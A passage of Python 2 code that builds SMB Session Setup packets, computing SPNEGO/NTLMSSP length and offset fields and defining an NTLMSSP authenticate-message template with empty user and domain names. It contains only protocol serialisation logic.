data2 = str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data3 = str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data4 = str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data5 = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NegTokenInitSeqMechMessageVersionTerminator"])+str(self.fields["nativeOs"])+str(self.fields["nativeOsterminator"])+str(self.fields["nativelan"])+str(self.fields["nativelanterminator"])
data6 = str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data7 = str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data9 = str(self.fields["wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["reserved"])+str(self.fields["andxoffset"])+str(self.fields["maxbuff"])+str(self.fields["maxmpx"])+str(self.fields["vcnum"])+str(self.fields["sessionkey"])+str(self.fields["securitybloblength"])+str(self.fields["reserved2"])+str(self.fields["capabilities"])+str(self.fields["bcc1"])+str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["AsnSecMechStr"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagStrLen"])+str(self.fields["NegTokenInitSeqHeadTag"])+str(self.fields["NegTokenInitSeqHeadLen"])+str(self.fields["NegTokenInitSeqHeadTag1"])+str(self.fields["NegTokenInitSeqHeadLen1"])+str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])+str(self.fields["NegTokenInitSeqNLMPTag2"])+str(self.fields["NegTokenInitSeqNLMPTag2Len"])+str(self.fields["NegTokenInitSeqNLMPTag2Octet"])+str(self.fields["NegTokenInitSeqNLMPTag2OctetLen"])+str(self.fields["NegTokenInitSeqMechSignature"])+str(self.fields["NegTokenInitSeqMechMessageType"])+str(self.fields["NegTokenInitSeqMechMessageFlags"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"])+str(self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NegTokenInitSeqMechMessageVersionTerminator"])+str(self.fields["nativeOs"])+str(self.fields["nativeOsterminator"])+str(self.fields["nativelan"])+str(self.fields["nativelanterminator"])
data10 = str(self.fields["NegTokenInitSeqNLMPTag"])+str(self.fields["NegTokenInitSeqNLMPLen"])+str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])
data11 = str(self.fields["NegTokenInitSeqNLMPTag1"])+str(self.fields["NegTokenInitSeqNLMPTag1Len"])+str(self.fields["NegTokenInitSeqNLMPTag1Str"])
## Packet len
self.fields["andxoffset"] = struct.pack("<H", len(data9)+32)
##Buff Len
self.fields["securitybloblength"] = struct.pack("<H", len(data1))
##Complete Buff Len
self.fields["bcc1"] = struct.pack("<H", len(data5))
##App Header
self.fields["ApplicationHeaderLen"] = struct.pack("<B", len(data2))
##Asn Field 1
self.fields["AsnSecMechLen"] = struct.pack("<B", len(str(self.fields["AsnSecMechStr"])))
##Asn Field 1
self.fields["ChoosedTagStrLen"] = struct.pack("<B", len(data3))
##SpNegoTokenLen
self.fields["NegTokenInitSeqHeadLen"] = struct.pack("<B", len(data4))
##NegoTokenInit
self.fields["NegTokenInitSeqHeadLen1"] = struct.pack("<B", len(data10))
## Tag0 Len
self.fields["NegTokenInitSeqNLMPLen"] = struct.pack("<B", len(data11))
## Tag0 Str Len
self.fields["NegTokenInitSeqNLMPTag1Len"] = struct.pack("<B", len(str(self.fields["NegTokenInitSeqNLMPTag1Str"])))
## Tag2 Len
self.fields["NegTokenInitSeqNLMPTag2Len"] = struct.pack("<B", len(data6))
## Tag3 Len
self.fields["NegTokenInitSeqNLMPTag2OctetLen"] = struct.pack("<B", len(data7))
#########################################################################################################
class SMBSession2(Packet):
fields = OrderedDict([
("wordcount", "\x0c"),
("AndXCommand", "\xff"),
("reserved","\x00"),
("andxoffset", "\xfa\x00"),
("maxbuff","\x04\x11"),
("maxmpx", "\x32\x00"),
("vcnum","\x01\x00"),
("sessionkey", "\x00\x00\x00\x00"),
("securitybloblength","\x59\x00"),
("reserved2","\x00\x00\x00\x00"),
("capabilities", "\xd4\x00\x00\xa0"),
("bcc1","\xbf\x00"),
("ApplicationHeaderTag","\xa1"),
("ApplicationHeaderLen","\x57"),
("AsnSecMechType","\x30"),
("AsnSecMechLen","\x55"),
("ChoosedTag","\xa2"),
("ChoosedTagLen","\x53"),
("ChoosedTag1","\x04"),
("ChoosedTag1StrLen","\x51"),
("NLMPAuthMsgSignature", "\x4E\x54\x4c\x4d\x53\x53\x50\x00"),
("NLMPAuthMsgMessageType","\x03\x00\x00\x00"),
("NLMPAuthMsgLMChallengeLen","\x01\x00"),
("NLMPAuthMsgLMChallengeMaxLen","\x01\x00"),
("NLMPAuthMsgLMChallengeBuffOffset","\x50\x00\x00\x00"),
("NLMPAuthMsgNtChallengeResponseLen","\x00\x00"),
("NLMPAuthMsgNtChallengeResponseMaxLen","\x00\x00"),
("NLMPAuthMsgNtChallengeResponseBuffOffset","\x51\x00\x00\x00"),
("NLMPAuthMsgNtDomainNameLen","\x00\x00"),
("NLMPAuthMsgNtDomainNameMaxLen","\x00\x00"),
("NLMPAuthMsgNtDomainNameBuffOffset","\x48\x00\x00\x00"),
("NLMPAuthMsgNtUserNameLen","\x00\x00"),
("NLMPAuthMsgNtUserNameMaxLen","\x00\x00"),
("NLMPAuthMsgNtUserNameBuffOffset","\x48\x00\x00\x00"),
("NLMPAuthMsgNtWorkstationLen","\x08\x00"),
("NLMPAuthMsgNtWorkstationMaxLen","\x08\x00"),
("NLMPAuthMsgNtWorkstationBuffOffset","\x48\x00\x00\x00"),
("NLMPAuthMsgRandomSessionKeyMessageLen","\x00\x00"),
("NLMPAuthMsgRandomSessionKeyMessageMaxLen","\x00\x00"),
("NLMPAuthMsgRandomSessionKeyMessageBuffOffset","\x55\x00\x00\x00"),
("NLMPAuthMsgNtNegotiateFlags","\x05\x8A\x88\xa2"),
("NegTokenInitSeqMechMessageVersionHigh","\x05"),
("NegTokenInitSeqMechMessageVersionLow","\x01"),
("NegTokenInitSeqMechMessageVersionBuilt","\x28\x0a"),
("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
("NLMPAuthMsgNtDomainName",""),
("NLMPAuthMsgNtUserName",""),
("NLMPAuthMsgNtWorkstationName",""),
("NLMPAuthLMChallengeStr", "\x00"),
("NLMPAuthMsgNTLMV1ChallengeResponseStruct",""),
("NLMPAuthMsgNTerminator",""),
("nativeOs","Windows 2002 Service Pack 3 2600"),
("nativeOsterminator","\x00\x00"),
("nativelan","Windows 2002 5.1"),
("nativelanterminator","\x00\x00\x00\x00"),
])
def calculate(self):
self.fields["NLMPAuthMsgNtUserName"] = self.fields["NLMPAuthMsgNtUserName"].encode('utf-16le')
self.fields["NLMPAuthMsgNtDomainName"] = self.fields["NLMPAuthMsgNtDomainName"].encode('utf-16le')
self.fields["NLMPAuthMsgNtWorkstationName"] = self.fields["NLMPAuthMsgNtWorkstationName"].encode('utf-16le')
self.fields["nativeOs"] = self.fields["nativeOs"].encode('utf-16le')
self.fields["nativelan"] = self.fields["nativelan"].encode('utf-16le')
CompletePacketLen = str(self.fields["wordcount"])+str(self.fields["AndXCommand"])+str(self.fields["reserved"])+str(self.fields["andxoffset"])+str(self.fields["maxbuff"])+str(self.fields["maxmpx"])+str(self.fields["vcnum"])+str(self.fields["sessionkey"])+str(self.fields["securitybloblength"])+str(self.fields["reserved2"])+str(self.fields["capabilities"])+str(self.fields["bcc1"])+str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])+str(self.fields["NLMPAuthMsgNtUserName"])+str(self.fields["NLMPAuthMsgNtWorkstationName"])+str(self.fields["NLMPAuthLMChallengeStr"])+str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"])+str(self.fields["NLMPAuthMsgNTerminator"])+str(self.fields["nativeOs"])+str(self.fields["nativeOsterminator"])+str(self.fields["nativelan"])+str(self.fields["nativelanterminator"])
SecurityBlobLen = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])+str(self.fields["NLMPAuthMsgNtUserName"])+str(self.fields["NLMPAuthMsgNtWorkstationName"])+str(self.fields["NLMPAuthLMChallengeStr"])+str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"])
SecurityBlobLen2 = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])+str(self.fields["NLMPAuthMsgNtUserName"])+str(self.fields["NLMPAuthMsgNtWorkstationName"])+str(self.fields["NLMPAuthLMChallengeStr"])+str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"])
SecurityBlobBCC = str(self.fields["ApplicationHeaderTag"])+str(self.fields["ApplicationHeaderLen"])+str(self.fields["AsnSecMechType"])+str(self.fields["AsnSecMechLen"])+str(self.fields["ChoosedTag"])+str(self.fields["ChoosedTagLen"])+str(self.fields["ChoosedTag1"])+str(self.fields["ChoosedTag1StrLen"])+str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])+str(self.fields["NLMPAuthMsgNtUserName"])+str(self.fields["NLMPAuthMsgNtWorkstationName"])+str(self.fields["NLMPAuthLMChallengeStr"])+str(self.fields["NLMPAuthMsgNTLMV1ChallengeResponseStruct"])+str(self.fields["NLMPAuthMsgNTerminator"])+str(self.fields["nativeOs"])+str(self.fields["nativeOsterminator"])+str(self.fields["nativelan"])+str(self.fields["nativelanterminator"])
CalculateUserOffset = str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NLMPAuthMsgNtDomainName"])
CalculateDomainOffset = str(self.fields["NLMPAuthMsgSignature"])+str(self.fields["NLMPAuthMsgMessageType"])+str(self.fields["NLMPAuthMsgLMChallengeLen"])+str(self.fields["NLMPAuthMsgLMChallengeMaxLen"])+str(self.fields["NLMPAuthMsgLMChallengeBuffOffset"])+str(self.fields["NLMPAuthMsgNtChallengeResponseLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseMaxLen"])+str(self.fields["NLMPAuthMsgNtChallengeResponseBuffOffset"])+str(self.fields["NLMPAuthMsgNtDomainNameLen"])+str(self.fields["NLMPAuthMsgNtDomainNameMaxLen"])+str(self.fields["NLMPAuthMsgNtDomainNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtUserNameLen"])+str(self.fields["NLMPAuthMsgNtUserNameMaxLen"])+str(self.fields["NLMPAuthMsgNtUserNameBuffOffset"])+str(self.fields["NLMPAuthMsgNtWorkstationLen"])+str(self.fields["NLMPAuthMsgNtWorkstationMaxLen"])+str(self.fields["NLMPAuthMsgNtWorkstationBuffOffset"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageMaxLen"])+str(self.fields["NLMPAuthMsgRandomSessionKeyMessageBuffOffset"])+str(self.fields["NLMPAuthMsgNtNegotiateFlags"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
